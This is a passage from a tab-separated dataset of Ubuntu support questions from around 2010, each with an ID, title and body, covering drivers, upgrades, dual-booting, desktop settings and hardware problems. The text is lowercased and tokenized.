] error 2 make [ 1 ] : leaving directory `/usr/lib/parallels-tools/kmods/prl_fs/sharedfolders/guest/linux/prl_fs' make : *** [ all ] error 2 make : leaving directory `/usr/lib/parallels-tools/kmods' error : could not build kernel modules error : failed to install kernel modules 2010-10-11t20:49:47-0500 : execcmd : ./install -- install [ 143 ] 2010-10-11t20:49:47-0500 : error : an error occurred when installing parallels tools . please go to /var/log/parallels-tools-install.log for more information . has anyone successfully got this to install ? is there something i can fix on my end , or do i have to wait for parallels to support it ?
6267	how do i synchronize a palm pda with evolution 2.30 ?	ubuntu 10.04 allowed me to sync my palm pda ( such as memos , calendar , address book ) with evolution using gnome pilot . however , in 10.10 , the options for evolution syncing in gnome pilot no longer exist . having googled my issue , it seems evolution 2.30 was built without the `` -- with-pilot-conduits '' flag . ( http : //www.linuxfromscratch.org/blfs/view/cvs/xsoft/evolution.html ) is there a way i can either install a version of evolution built with support for gnome pilot ( preferably from a .deb file or repository ) , or compile it myself ?
6271	how to remove group in empathy ?	i have created a new group in empathy im by right-clicking on a contact , then edit and add group . how do i remove a group ? update : ok , obviously murat gunes answer is correct , but that 's not exactly what i meant . when i right click on the group name and select remove it removes the group from the main window . however , the group is not purged from the system . when i right-click on a contact again and select edit , i can still see the group in the list and i can even put a contact into that group , which then makes it appear again in the main window .
6273	open source graphics card options ?	what graphics cards work best with open source drivers ? drivers must be open source needs to support 2 or more monitors compiz is desirable , but not required i do n't care about games is there hardware that exists right now that fits this bill ? edit : clarification : i 'm really looking for hardware other than nvidia/ati .
6276	how do i make the webcam work with flash 10.2.161.23 ?	i have a webcam and it works with cheese and gmail video . the problem is that it does n't work on a lot of broadcasting websites ( like tinychat ) . the flash permission popup does n't appear when i try to use the webcam . ubuntu 10.10 ( x64 ) with flash 10.2.161.23 ( x64 ) . are there extra steps to be done ?
6282	where 's kprinter in lucid ?	i 've been using kprinter for several years as a way to give programs that do n't have fancy print dialogs ( like gvim ) a fancy print dialog . from a command-line sense it looks a lot like lp or lpr , but it pops up a gui for choosing printers and setting printing option ( eg : duplex , pages per side , page ranges , etc. ) . i ca n't find kprinter on my system since upgrading to lucid . what package is it in ? if it 's been permanently removed ( as seems to have happened with a few other things i used to use ) is there a good alternative ? i found gtklp , which is passable , but does n't seem quite as nice as kprinter .
6284	how to tether with a blackberry 9000 via bluetooth ?	how do i tether my ubuntu 10.10 via bluetooth with blackberry 9000 ? i set everything up and tried to connect , but it keeps asking me for the password . i do n't know what password it wants . thanks in advance
6287	how do i set the representation of dates ?	living in the united states , it is most common to have dates expressed like the following : oct 12 , 2010 october , 12 , 2010 10/12/2010 tue oct 12 tuesday , october 12 , 2010 i prefer the big endian form for my dates like below : 2010 october 12 2010-10-12 2010 oct 12 , tuesday or the little endian form 12 october 2010 tuesday 12 october 2010 12.10.2010 4 digit years , 2 digit month without changing the locales information for my currency , etc , how would i go about setting this up so that system wide it can be expressed in either of the types of forms .
6290	ubuntu wo n't install on my desktop	hardware specs motherboard : msi 770-g45 ati hd5770 ( h577fm1gd ) connected to monitor through single dvi port amd phenom x4 black edition when i try to boot up from a live cd/live usb all i get is a black screen , i can boot into the current windows 7 mode fine . what can i do to remedy this situation .
6291	kernel panic when upgrading to 10.10	yesterday i downloaded the 10.10 update using the update manager . the download went normally , but i encountered numerous errors while the new packages were installing , which caused my upgrade to fail . i restarted my computer , and after the bios screen i began to consistently get the following error : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) pid : 1 , comm : swapper not tainted 2.6.35-22-generic # 33-ubuntu and then there is a 10 entry call trace . i 've been searching for a solution since this happened last night . some forums recommended running a disk test , which i did from the live cd with no errors . i also tested the memory , and that showed a lot of errors ( 62 ) . so maybe my ram is toast , but i do n't know why it would fail on the upgrade . i also ran the boot info script found on sourceforge , and the results.txt file is here : http : //pastebin.com/mkc2ts9e thanks for the help .
6295	how can i get google earth working ?	i would like to install google earth under ubuntu 10.10 . under v10.04 there were some problems . has anyone been able to get it working satisfactorily ? was wine used ?
6301	how to compile vim with gui ?	i want to learn how to compile vim from the sources , because there are some additions that i want to add , and learn how to deal with this situations , but until now i did n't have success doing it , i can compile vim , but without its gui i think it 's a dependencies problem , but i ca n't figure out which packages i have to install , what are the dependencies to compile vim with its gui ? i found an article about how to compile gvim , but i do n't have the packages for install in my ubuntu 10.10 repositories , i hope to find some help with this greetings
6302	how can you remove unity ?	in previous versions of netbook remix i was able to disable the netbook-launcher and just have a blank desktop . i liked the speed of the netbook version but not the interface , this worked well for me . how can i remove unity ? it would also be useful to have removal instructions for all versions of ubuntu .
6307	how do i install gnome shell ?	how to a install and use gnome shell in ubuntu 10.10 ?
6309	how to mount freenas network share persistently	i have a freenas server in the house on which we keep our media . i would like to be able to automount this share in a persistent location when the machine is turned on so that the music players can index the music and we can conveniently browse through the folders etc . how will i accomplish this ?
6317	how can i install windows after i 've installed ubuntu ?	i have ubuntu on my laptop . now i want install windows 7 in a dual-boot . how can i do this ? i ca n't lose my ubuntu files , and i 'm afraid that i might break grub .
6323	nvidia graphics card failed after upgrade to 10.10	after upgrade to 10.10 my system is unable to start in normal mode due to problems with graphics drivers . the laptop ( hp dv9500 ) boots only in failsafe , low resolution graphics mode . here 's the message from the log : [ 67.427 ] ( ii ) loadmodule : `` nvidia '' [ 67.427 ] ( ii ) loading /usr/lib/xorg/extra-modules/nvidia_drv.so [ 67.428 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 67.428 ] compiled for 4.0.2 , module version = 1.0.0 [ 67.428 ] module class : x.org video driver [ 67.431 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 67.431 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 67.431 ] ( ii ) unloadmodule : `` nvidia '' [ 67.431 ] ( ii ) unloading /usr/lib/xorg/extra-modules/nvidia_drv.so [ 67.431 ] ( ee ) failed to load module `` nvidia '' ( module-specific error , 0 ) [ 67.431 ] ( ee ) no drivers available . what i tried to do already : sudo apt-get purge nvidia* sudo apt-get install nvidia-current modprobe nvidia fatal : module nvidia not found .
6328	how do i install ubuntu ?	i would like to see a full how-to on how to install ubuntu .
6332	prevent xchat from trying to join channels until i have been authenticated	i use xchat for irc . some of the automatic channels i want to join require that i be identified with services . i have set xchat to autologin with nickserv when i start up , but sometimes there is a delay , it will try to join certain channels ( and fail ) , before i am authenticated . is there some way to tell xchat to delay trying to join some channels until after i am authenticated ?
6337	usb mouse moves but does n't accept left clicks	i 've just installed a fresh copy of 10.10 and for some reason the mouse would n't work correctly . i can move it , and i even have context menu on the desktop and the network and sound applets ( i am using the default theme if that even matters ) , however i can not open anything else . the mouse is a a4tech x-708 connected via usb and the keyboard is on ps/2 .
6339	how do i install the latest stable version of firefox ?	i want to install the latest firefox on my ubuntu ( 64bit ) box . what is the best way to do this ? is there a specific update site or should i download the binaries manually ? if doing manually , in which directory should i put the files ? in my home directory , or is there a better place ?
6340	can not connect to internet from terminal and other programs ( authentincation involved )	i have a brand-new ubuntu 10.10 installed in a vmware 7.1 workstation . i am in a lan and we 're connected to internet through a proxy which requires authentication . i use 3 ( three ) browsers : the latest versions of opera , chrome and firefox . each one of them is set up to look for our proxy at the ip 192.168.3.1 ( example given ) and the port 8081 . each one of them finds the proxy , asks for the username and the password and after this connects correctly to the internet . the same thing applies for the synaptic package manager : having the correct proxy data in the settings - > preferences - > network it works ok . however the ubuntu software center fails to install any package which i will choose . the error ( s ) is/are authentication failure . also in terminal issuing a sudo apt-get install mypackage the apt can not connect to the needed repository to fetch the data from there . also i mention that i have set up in the ubuntu 's main menu in system - > preferences - > network proxy preferences the correct values for proxy ( ip address , port and the authentication bits : username & password ) . the interesting thing is that if i do the following steps , it works : start the synaptic . start the ubuntu software center . choose something to install from ubuntu software center . it will throw a 'waiting for synaptic to close ... ' close the synaptic . install what you want from the ubuntu software center . ( and perhaps also from terminal - not tested ) what i 'm missing ? how can i set up other programs ( mainly the terminal and the ubuntu software center ) to succeed connecting to internet ? update : yes , i 've pressed the apply changes system-wide ... in the ubuntu 's network proxy 's dialog .
6341	rtl8180l wireless card does n't work ?	the lspci sees the card installed ndiswrapper , and windows drivers too , the ndisgtk sees the card . the system does n't detect any wireless network . i 've tried everything ( command line , etc . ) but no success . i have to mention that this happens on livecd , and i do n't want to install it until i 'm reassured that it would work . i 've tested the .iso with virtualbox , and through the nat i could use the network seamlessly . thanks for help !
6357	do n't start xserver	i 'm trying to convince ubuntu 's init system not to start x11 at boot-up . removing gdm did not change the fact that each time the machine restarts , x11 with gnome comes up . how do i get rid of it ? i need to auto-login as root with no xserver after startup . it 's inteded for a very specific automation-purpose to behave like that and not meant for desktop experience ; )
6358	how do you restart apache ?	i switched from sles to ubuntu and now i want to restart my local server . in sles i used : rcapache2 restart but this somehow seems not to work in ubuntu . : ( how do i restart my apache ?
6361	ubuntu on microsoft virtual pc	do you have tips or a guide how to install ubuntu in microsoft virtual pc ? i have found some ( older ) information , but i wonder if this is still valid . and it looks very `` unfriendly '' .
6363	how to upgrade an old package in say ubuntu 6.10 to what 's available for 10.04 ? ( i.e . openssh )	i would like to learn how to upgrade packages in older ubuntu versions to what 's available in current versions . i assume there is always a manual way to do it , but is there something more automated such as using additional sources and the power of apt-get ? thanks , nile
6370	how can i install netbook edition without losing windows ?	i 'm using windows 7 starter on my netbook and i want to install ubuntu 10.10 netbook edition but i do n't want to lose anything . i want to keep windows and use both systems on my netbook . i created a ubuntu usb stick , and restarted to install but there is n't an `` alongside other operating system '' option . what can i do ?
6381	no install button in software centre ?	i can not install most of the software as not all of the software has a button to install . is this an error ? or dependency problem if so how do i fix it ?
6382	how can i get a displaylink usb monitor under ubuntu ( any recent version ) ?	i have a displaylink-based external usb monitor , which has both power and data over usb , and seems to work perfectly under windows 7 , but only can display a text console under ubuntu 10.10 , and that i can only use when i am actually switched to it . so the only use i can have so far is to have some text-based monitoring or console that i can watch while working on the graphic display . i know there are some development done for displaylink , but i never could get it to actually run properly . yes , i tried the detailed setup described in other posts , but they did not work , and instead crashed my x that i had to restore . merci : - )
6383	firefox crashes very often - attempting to load the system libmoon	today firefox started crashing whenever i 'm trying to open the preferences editor , and also often during normal navigation . if i start firefox from a terminal , when it crashes it returns the message : attempting to load the system libmoon .
6388	change dropdown menu color in default maverick theme ?	does anybody know if and how i might be able to change the color of the dropdown menus in maverick 's default theme ? i like most parts of the theme enough to not really want to change , but i find the black dropdown menus hard to stomach . i think the inverse would be nice and would provide a nice contrast with the black menu and title bars . however , the customize dialog ( in appearance ) does n't give the option to make this change . is there another way ?
6392	how rhythmbox music management works ?	i have some problems importing my music files in rhythmbox . under preferences - > music i set the directory hierarchy i want but when i import music from a directory it does n't copy the files in my music dir . also if i manually copy the files in my music it imports them but does n't rename them .
6398	how does ubuntu detect hardware ?	are there any common actions that user have to do after installing new hardware ? is ubuntu makes some hardware-dependent adjustments during installation ( except generation of /etc/fstab file ) , that user should do when changing any device , like motherboard , graphic card or other ? methods of detection hardware in ubuntu is not clear for me . what i can read about it ? i have not real problems right now , but i would like to know what to do when it happen . ( ps : do you understand me ? : - ) i am not a native english speaker and it is my first experience , please comment my mistakes : - )
6400	what is the best way to make my desktop look like a mac ?	i heard something about macubuntu and want to try . is there anyone using macubuntu and what do you think about it ? : )
6404	how to fix my middle mouse button being recognized as left mouse button ?	i 've updated my system to 10.10 and since then my `` middle mouse button '' ( on my laptop , under touchpad ) is recognized as my `` left mouse button '' . if i open xev , i can see that both , my `` left and middle mouse button '' are being referred to as `` button 1 '' . can anybody me to fix this problem and make my middle mouse button behave like a middle mouse button again ?
6406	thinkpad x61 tablet wacom stylus	when i test drove maverick on the usb drive the stylus and buttons worked perfectly . now that i have installed maverick , the stylus buttons are switched . is there a way to get the config file that is used by ubuntu when it is demoing ? thanks
6418	how can i remove the unity launcher ?	unfortunately , the unity launcher on the left hand side of the screen takes more valuable space away than the new menu bar gives . is there any way to get rid of the launcher ? alternatives i would be satisfied with include : not having the launcher at all having the launcher hide automatically having applications open on top of the launcher ( not next to it ) ( edit : ) note that i am specifically looking for a way to keep the global menubar , while getting rid of the launcher .
6419	internet ( http ) is not working on sony viao	i switched my sony viao laptop from xp to ubuntu 10.04 recently . i have it connected through router at home . the internet was working fine with xp . with ubuntu , i am not able to connect to interenet . i am able to update using apt , and i am able to ping too . it seems like there is a dns issue , when i try to goto sites from firefox , it does n't work . i tried disabling the ipv6 in firefox config , it does n't work . my router is on 192.168.2.1 instead of 192.168.1.1 any ideas on what config i might need to change to make this work ? or could this be a drive issue ?
6421	how do i get some usb devices to be recognised when i plug them in rather than only on boot ?	i have a number of usb devices ( including a usb external hd ) which will only be recognised by ubuntu during boot . for example : if i plug in an rs232 device using a serial- > usb device then boot ubuntu /dev/ttyusb0 is generated . however if i plug it in once ubuntu is already booted , i do n't get any /dev/ttyusb0 until i reboot . this is pretty annoying ; is there anything i can run to get this to work ?
6422	how to distribute windows over virtual desktops in gnome	i have a load of virtual desktops running and i usually have one full screen application per desktop ( so sort of like the ratpoison wm but with an option to use it in other ways when needed ) . i want new windows to automatically be put in certain desktop numbers when they start up . what 's the easiest way to do this ?
6424	my trackpad does n't turn on after i turn it off , before that it works	the trackpad on my asus laptop does n't work after i press off and then on . before i press off the first time it works well , afterwards it does n't work even though the light indicator is on . this problem has happened to me since ubuntu 10.04/linux mint 9/and now 10.10 , it works fine on win7 , but i do n't really want to boot there ; ) .
6431	how can i stream music from my home machine to mobile devices ?	i currently have ubuntu 10.04 ( planning on upgrading soon to 10.10 ) on a server at home with a large music and video collection . i own a blackberry bold 9700 on at & t and an htc desire ( android ) on us cellular , and i 'd like to be able to listen to music ( and perhaps even watch these videos , although this is less important ) easily from both of these phones while on the go . i 've installed subsonic , which is quite nice and does a lot of what i 'd like to do , except that using the android app requires paying a license fee that i 'd rather avoid by finding a truly free alternative , and simply going through the web interface on either phone 's browser is hardly easy or intuitive . any suggestions or ideas would be appreciated.. hearing from people who have already found working solutions for the bold 9700 would be ideal , as this is my primary phone .
6432	will ubuntu one feature revisions ?	i am considering switching over to ubuntu one to back up all of my files because of some slight issues i had with dropbox and i was wondering when ubuntu one will feature revisions if it will at all .
6439	which gconf-editor setting effects the `` on-top '' relationship of parent/child windows and dialogs ?	i 've lost track of which setting i tweaked in gconf-editor . now , my child windows/dialogs stay on-top of the parent . ... and oddly enough the virtualbox main console window stays on top of the client window . i usually keep a log of settings i tweak , but this time i did n't . does anyone know where this setting is ? ** ps . oops.. i just realized i posted this question the other day .
6440	how to move tab bar in empathy ?	empathy is a rather nice im client and i like the included themes , but i do n't see how to move my tabs in my conversation windows to the bottom of the window instead of the top.. any ideas ?
6441	`` unable to retrieve server list '' error when viewing network shares ( internet in browser works )	i 'm getting this error , although since installing ubuntu 10.10 the network did work once , but now i get this error all the time . where do i go to resolve ? network config is far from obvious from the gui !
6444	using % in a cron command	since the % has special meaning to cron , how do i use it as part of a command ? i found this page http : //www.hcidata.info/crontab.htm , which mentions piping echo and sed to escape the % and then remove the extra \ , but in my case , the command is date , which does n't accept parameters through stdin , so this does n't work : echo '+\ % y ' | sed -e 's|\\||g ' | date i 'm thinking i can create a special date script that will output the date in the format i want , and call that instead , but i 'm still wondering if it 's possible to do it directly in the cron command . thanks !
6445	can i create a 4tb raid 1+0 volume ?	i 'm thinking about setting up a nas based on ubuntu server , but before i invest the money , i want to make sure what i want to do is possible . what i 'm thinking is a 4x2tb raid 10 , so my usable storage will be 4tb . i 'll have a separate 2.5 inch drive that ubuntu will boot from , and i 'm going to use software raid . i also want the volume to be usable as a samba share to windows machines on my network . will ubuntu have any problems with this ? i 've heard of the 2tb limit , but it seems ubuntu is unaffected by this . i just want to make sure . is there a limit to the size of a volume ?
6451	true column-mode ( block-selection and editing ) text editor solution ?	in windows , i used to use a text editor called crimson editor which featured the best column-mode editing support i have yet to use . when enabled via a simple alt-c shortcut , selections could be made with the mouse or cursor keys and they would be visual blocks rather than wrapped-lines . these selections could be deleted , moved , copied , pasted , and all of the operations just made sense . you could also just start typing , and you 'd get a column of the characters as you 're typing . there are multiple ways of getting parts of the these features working separately discussed on this forum thread , but no one has yet to provide a solution that provides this all-encompassing and easy-to-use method . if someone could point me to a gedit plugin where this work is actively being pursued , perhaps i could help with the coding myself . if someone is aware of a text editor that already provides this full functionality , i 'd appreciate the info . running crimson editor through wine and the close-but-not-quite multi-edit plugin for gedit are the temporary solutions i 'm 'getting by with ' for the time being . update ( 2012-11 ) : i 'm now a very happy user of sublime text . it supports excellent column-mode editing and works on all three major os platforms without any issue . highly recommended !
6453	problem upgrading from ubuntu 10.04 to 10.10	i 've been trying to upgrade from 10.04 to 10.10 . during the package installing and upgrade process there were numerous packages which threw errors but it continued installing . the last one to fail was squid , when this failed the upgrade manager quit-out without finishing everything . when i restarted i get a kernel panic error : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) pid : 1 , comm : swapper not tainted 2.6.35-22-generic # 33-ubuntu similar to the question asked here . at the grub loader i tried to boot to 2.5.32 but this drops into an incomplete command-line ( busybox ) with limited commands with the error : udevadmn trigger is not permitted while udev is unconfigured any help would be greatly appreciated .
6461	why does my panel drawer not work properly ?	i used the add to panel applet to add a 'drawer ' of common shortcuts to my gnome-panel , but when i click on the drawer icon , it only pops up far enough to see one icon until i mouse over it and hover there for a second or two . then , it finally expands the rest of the way so i can click on the other icons . how can i fix this annoyance ?
6465	laptop losing wireless connection randomly after upgrade	i have some strange wireless connection problems after upgrading to 10.10 . i was using 10.04 before and everything was fine . the problem i can connect to my access point but i 'm constantly losing the connection randomly . i can surf for 5 minutes or 2 hours without any problem and then it simply looses the connection . it tries to reconnect but fails and starts asking me for the password again . retyping it and hitting connect does n't help . after a lot of time it eventually connects again . i have tried to delete the connection in the connection manager and to reconnect again as if it would be a new connection . then it works instantly . i have no clue how to solve it nor was i able to find any answer on the internewbz . edit : providing some lines of syslog . oct 12 20:04:45 lenovo-t60 networkmanager [ 824 ] : < info > ( wlan0 ) : supplicant connection state : associating - > disconnected oct 12 20:04:45 lenovo-t60 networkmanager [ 824 ] : < info > ( wlan0 ) : supplicant connection state : disconnected - > scanning oct 12 20:04:48 lenovo-t60 wpa_supplicant [ 907 ] : trying to associate with 00:1b:11 : fe:51:02 ( ssid='home ' freq=2457 mhz ) oct 12 20:04:48 lenovo-t60 networkmanager [ 824 ] : < info > ( wlan0 ) : supplicant connection state : scanning - > associating oct 12 20:04:48 lenovo-t60 kernel : [ 41340.246963 ] wlan0 : direct probe to 00:1b:11 : fe:51:02 ( try 1 ) oct 12 20:04:48 lenovo-t60 kernel : [ 41340.444098 ] wlan0 : direct probe to 00:1b:11 : fe:51:02 ( try 2 ) oct 12 20:04:48 lenovo-t60 kernel : [ 41340.644099 ] wlan0 : direct probe to 00:1b:11 : fe:51:02 ( try 3 ) oct 12 20:04:48 lenovo-t60 kernel : [ 41340.844079 ] wlan0 : direct probe to 00:1b:11 : fe:51:02 timed out oct 12 20:04:58 lenovo-t60 wpa_supplicant [ 907 ] : authentication with 00:1b:11 : fe:51:02 timed out . this pattern is repeating over and over again . tell me if you think there is any other log files which might be of interest . i 've looked through them already and could n't spot anything but maybe i 've missed something .
6467	why would /etc/init.d/mysql run the wrong upstart job ?	update : /lib/init/upstart-job has been replaced with the mongodb init script . for some reason , /etc/init.d/mysql start|stop|restart|status ( /etc/init.d/mysql is simply a symlink to /lib/init/upstart-job ) is affecting my mongodb install , not my mysql install . service start|stop|restart|status mysql works as you 'd expect . an example : root @ score : ~ # /etc/init.d/mysql status * checking status of database mongodb ... fail ! root @ score : ~ # what could cause this , and how can i fix it ? scripts : /lib/init/upstart-job : http : //paste.ubuntu.com/517647/ /etc/init/mysql.conf : http : //paste.ubuntu.com/517648/ /etc/init/mongodb.conf : http : //paste.ubuntu.com/517649/
6468	should i upgrade to 10.10 now or wait a while longer ?	i use netbook edition of ubuntu and i am quite happy . should i migrate now ?
6473	how best to upgrade on netbook without lot of space ?	i dont have a lot of space on my netbook . my 8gb drive is now almost full with about 250mb space . what is the best way to upgrade to ubuntu 10.10 ? will i have to download a lot of files ? can i use an usb drive for the upgrade ? or is the best way to free up some space and upgrade as normal ?
6476	how to prevent package removal upon upgrade to new ubuntu version ?	i have upgraded to ubuntu 10.10 from 10.04 , but the upgrade removed some of my packages that i had manually installed . these package ( dekiwiki from mindtouch amongst others ) are not supported by canonical . the removal of this packages resulted in the removal of my website . off course this is my responsibility , but how can i prevent such things from happening in the future ?
6479	no wifi on hp netbook 2133	after installation of 10.10 in my hp mini 2133 . i have no wireless connexion . the blue led is on but no way to detect the wifi beside me . the wifi integrated card is a broadcom bcm 4312 802.11 a : b : g ( rev 02 ) . i tried to install the 2 drivers found after clicking menu admin/additional drivers . but no way . the sta and the b43 new drivers did n't solved my problem .
6480	is synaptics touchpad supported ?	i have been using ubuntu since 5.10 ( breezy ) and never did it disappoint in the area of hardware support . yeah there were some issues with broadcom wifi chips , but it was fixable . but now since 10.04 , i can not get my synaptics touchpad operational . i bought a new vaio laptop and its touchpad was not supported as well . i want to know whether it is because of kernel update or change to udev from hal ? ? is there a fix ?
6485	arabic reading error	i ca n't read arabic correctly ( from right to left ) when using firefox to open flash websites in ubuntu 10.10 example : http : //www.fpnp.net/ please i need help , thanks ...
6486	how to dual boot with windows xp and partition ?	windows xp pro s3 is already installed on my laptop hp elitebook 6930p . i am trying to partition and dual boot . this is all new to me as this is my first time installing ubuntu . partition is the most confusing part , it shows up 160gb with ntfs file format and a blank /sdv ( or something ) . i ca n't resize the 160gb , had to select the blank option and click add . when i do this the ntfs becomes free space ? ? i dont want windows xp to be overwritten . i have seen videos and read documentation online but they are all reference to older ubuntu version . nothing simple for this noob : ) objective -dual boot with windows xp an ubuntu 10.10 -partition the drive , with swap , ext4 , fat32 ( transfer files between ubuntu and windows xp ) , and ntfs ( keep windows xp )
6490	is a /boot partition necessary anymore ?	a fair while ago ( ~ 2004 ) i was told to always create a separate partition for the boot directory . and since then i always have . but after reading a few questions about partitioning questions , i 'm curious . do i still need a /boot partition ? note : if helpful , i 'm dual booting ( win xp or 7 ) & ubuntu 10.04 . i also have one partition ( using ext2/3 ) which i use to share files between the two operating systems .
6491	laptop immediately suspends when going onto battery power	i 've got an msi wind , model u100 that 's been running ubuntu without trouble for a long while . after upgrading to 10.04 a few months ago , i 've had this strange problem . as soon as i unplug the laptop from the power source i get the warning dialog telling me that my battery is critically low , and the laptop suspends , regardless of what the battery level actually is . if i then turn the laptop back on , it runs fine and shows the correct battery level . i 've been working around this by manually suspending before switching to battery power , but i 'm wondering if anyone else knows the cause or a fix .
6499	provide driver on removable media during installation ?	during installation if the installer is unable to detect any disks it will present you a list of all the available drivers to select or you can select none of these . once you select that it gives you a couple of options . one of them is to scan removable media for a driver . does anyone know what it 's looking for ? i 've tried just putting the proper .ko file on a floppy in / as well as putting it in /lib/modules/ < kernel version > /kernel/extras/ and a few other places but in the end i have to manually mount the removable media and load the module using insmod .
6501	replacing vi by vim	in my college our admin has replaced vi by vim . so how do i replace vi by vim so that , when i type vi in terminal , then vim should get opened . i know doing so is silly , but i am asking it just out of curiosity . thanks .
6505	wubi install for mac os x	i just installed ubuntu 10.10 on my windows 7 box using wubi and i 'm loving it so far . one feature that i love is the fact that because i used wubi it does n't seem to create a separate partition . through what i can only imagine is some vm magic windows and ubuntu live together on the same hard drive without a partition and you can even access windows files from within ubuntu and visa versa . i also have a macbook and i would love to be able to install ubuntu on the macbook as well but i do n't want to surrender a portion of my disk space to a different operating system . is there currently a way to do the whole wubi vm `` virtual partition '' on a mac ?
6507	can i recover the `~/` short-cut ?	i upgraded to 10.10 on sunday , from 10.04 , and while the upgrade went smoothly ( and i really like maverick so far ) i 've somehow lost the ~/ short-cut . previously , if i was in directory /var/www/sitename/ and i typed ~/ into the location/address bar i 'd be taken to /home/username/ , whereas now it seems to be treated as a relative path , and i 'm taken to the ( non-existant ) /var/www/sitename/~/ directory . can i restore the previous functionality ? i seem to recall that i okay-ed a dialogue during the installation , but i ca n't , for the life of me , remember what it said . or if it gave any clues as to how to later change that opinion . edited to note that , as of ubuntu 11.04 , the ~/ shortcut has been restored .
6508	how can i change the hotkey to firefox 's search engine field ( next to the address bar )	in the ubuntu version of firefox , the keybinding to the the search engine text-box ( next to the addressbar ) is different to what i am used to ( in the windows version ) . can i change this key form control - k to control - e ? i 've tried editable menu accelerators , but that did n't work .
6521	how can i reconfigure the nvidia proprietary drivers from the command line ( ssh ) ?	i have a linux htpc ( running xbmc ) in my living room . this morning i ssh'ed into the machine and did upgrade it to 10.10 . when it finaly resarted it says something about running in low quality graphics and eventually returned to a command line login prompt . i ssh'ed in again and did a sudo reboot now . when it came back on this time the image is rapidly scrolling from the top to the bottom of the screen . i guess the installed driver does n't quite work with the s-video port on which the tv is connected . previously it was working right with the nvidia proprietary drivers . how can i install thoses without using the gui tool that comes with ubuntu ?
6522	how to install tor ?	i tried to install tor on my new version of ubuntu but it seems that tor is not available in repositories . how else can i do it ?
6523	touchpad not working on hp pavilion dv6	everything worked fine in ubuntu 10.04 , flawless in fact , i admired the way the operating system had handled such a unique touchpad so well . i have an hp pavilion dv6 . the touchpad and left , middle , and right click buttons are all on the trackpad , and it the bottom end depresses to click accordingly for each kind of click . in 10.04 , everything worked fine , upon upgrading to ubuntu 10.10 things became ... odd . the scroll on the side would work , as would the left click . the right click would n't work however , but if you would lightly tap the exact right corner of the touchpad , the right click menu would come up , though it was inconsistent and difficult to make it do so . i have applied a fix i found on the older ubuntu forums for a similar issue , and it restored the normal left and right click , but it is n't as fluid , and there is n't the vertical scroll feature , which i do rather like to have ... i would just like things to be as it was , if this is possible , please , please tell me how to do so . thank you .
6529	is there a tool for web based system administration ?	what web based system admin tools are there for ubuntu ? basically i want to setup a headless server at home and want to make it easy for my family to change some settings . i 'm familiar with webmin but want to see what other options are available .
6531	why there is no login/password for ubuntu one under system- > preferences ?	what type of authentication ubuntu one uses ? why there is no login/password fields under system- > preferences- > ubuntu one entry ? is current u1 auth based on cookies or something ?
6533	what is required to use networkmanager user connections without an x session ?	i want to use my networkmanager user connections from console without starting an x session . there seem to be some dependencies : ~/ > nmcli con list ** ( process:4418 ) : warning ** : fetch_connections_done : error fetching user connections : ( 2 ) the name org.freedesktop.networkmanagerusersettings was not provided by any .service files . name uuid type scope timestamp-real name uuid type scope timestamp-real after logging in to gnome nmcli works as expected : ~/ > nmcli con list name uuid type scope timestamp-real name uuid type scope timestamp-real home 5 ... 2 802-11-wireless user tue 12 oct 2010 06:23:12 pm eest lan 0 ... 8 802-3-ethernet user wed 13 oct 2010 12:11:36 am eest ...
6537	hangs on splash screen after login ( auto-login ) , how can i fix this ?	computer : toshiba terca a4 os : ubuntu desktop 10.10 after installing 10.10 , the splash screen hangs and the mouse pointer appears . anyone know what i can do to fix this ? ~/.xsession-errors has ( nautilus:3190 ) : gconf-critical ** : gconf_value_free : assertion `value ! = null ' failed btw , safe-mode works : i do a ctrl-alt-f1 into a command prompt session and run ps aux | grep slave then sudo kill [ id of gdm-simple-slave ] that killed the session and allowed me to login in safe-mode . safe-mode works . then i open a terminal and run ps aux | grep nm- sudo kill -9 [ id of nm-applet ] nm-applet -- sm-disable & to get my internet connection up .
6539	will all my settings be kept if i update from to the next version of ubuntu ?	i 'm very new to linux ; i 've been using lucid for about 5 months and really like it . what is the best way to update to maverick without losing all my settings ? will just running the update manager actually do a full kernel update ?
6544	nvidia driver causing flickering in menu ?	like many ubuntu users i 'm using compiz desktop effects with gnome . however since ubuntu 10.10 i 've noticed that the zoom effect on my drop down menus i.e . the gnome menu bar have a flicking thin white border when they are opened . it appears very briefly and flickers each time a drop down menu is opened . i ca n't remember this happening on ubuntu 10.04 and it does n't seem to be theme specific , as i tried it on ambiance and radiance and still see the flicking white border . i 'm using the nvidia-current proprietary driver enabled through additional drivers menu . thanks for any help on the matter !
6546	apt-get could n't find package	i have encountered this error several times lately on both ubuntu server/desktop . e : could n't find package . i am trying to install the gui desktop on the server 10.10 thanks .
6549	transferring libraries from windows 7 into wine	i was wondering if i would be able to transfer my libraries from my windows 7 partition to wine . i am pretty sure this is legal because i would be using the libraries from a windows installation that i payed money for . even if this is possible would it create any benefits ? if so , would i be able to run any windows application i want ?
6551	warnings when restarting apache	i setup a lamp in ubuntu 10.10 and it seems to be working fine but a couple of things are weird . the weirdess thing is that whenever i use : /etc/init.d/apache2 restart i get : could not reliably determine the server`s fully qualified domain name , using 127.0.0.1 for servername . funny thing is that if i /etc/init.d/apache2 status apache is running so i assume everything is ok but i have to reboot the server everytime i change something since /etc/init.d/apache2 restart does not seem to do anything . i am pretty lost in ubuntu ( not complete newbie but close ) .
6558	what screenshot tools are available ?	i would like to post more to ask ubuntu . i have noticed here that many people use images in their answers . what software are people using ? please limit one piece of software per answer
6560	how can i get unity to recognize installed applications it does n't list ?	firstly , i should say i am enjoying the new unity interface . it 's not without it 's peccadilloes , however . my main concern , for the purposes of my question , is that there are a couple of applications that i have installed which do not appear in the application list accessed on the unity launcher . is there a way to force unity to acknowledge these skipped over programs ? one of the programs i am having trouble with is ryzom , a online role playing game . it 's a game that does n't require a traditional install like most programs . you simply extract to a folder in your home directory and run the client program . perhaps unity does n't recognize programs that are n't `` installed '' . can i add ryzom to the applications list so i can start it without resorting to terminal ? i 've tried using the main menu function in system , but apparently that has no bearing on what applications show up in unity . that would explain why all the program i had hidden in main menu are showing up in unity . thanks for any insight you can give .
6574	my webcam flips the picture , how do flip it back ?	on my asus ul30vt with maverick installed i have the problem that the webcam shows the picture flipped . what can i do to make it normal ?
